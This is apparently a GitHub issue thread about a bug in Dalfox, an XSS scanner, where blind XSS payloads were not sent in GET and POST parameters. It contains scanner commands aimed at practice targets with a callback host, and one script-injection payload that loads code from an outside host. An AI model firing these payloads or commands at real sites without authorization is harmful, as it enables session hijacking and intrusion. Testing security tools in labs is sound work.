Closed tekcap closed 1 year ago
Hi @tekcap
What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env. I need to know the exact situation, so please check it! (blind XSS is sent in various patterns in various sections such as parameters and headers.)
dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090
Oh, there's one thing I found out. Based on the current pkg, parameters other than reflected are not testing blind xss. I think this was the problem, let me check quickly!
I'm on version v2.8.1 installed with go command provided.
For some reason, the blind XSS doesn't even get sent in the url parameter. I don't see the payload anywhere in BURP
@tekcap
There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2
and check it! If it is reproduced in v2.8.2
, please re-open it. Thank you very much :D
--report
flag)Old
New
./dalfox version
# v2.8.2
./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
-b hahwul.xss.ht \
--proxy http://localhost:8090
I just realized this issue still persists when using "file --rawdata" with a post request.
I think you fixed it for GET, but not POST.
I see the Referrer header is working with the blind payload, but not the parameters
@tekcap Thank you for the report! Let me check again :D
Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.
dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1
The imgurl parameter is vulnerable to this XSS payload:
"><script src=http://IP:8080></script>
I'm assuming Dalfox will use that payload since it's a very basic one.
The debug shows this, but I'm not sure what it means:
Does the false mean that it's not attempting the blind payloads? All the other debug lines are showing me the payload that it is currently testing, but when the blind debug lines appears, it's empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.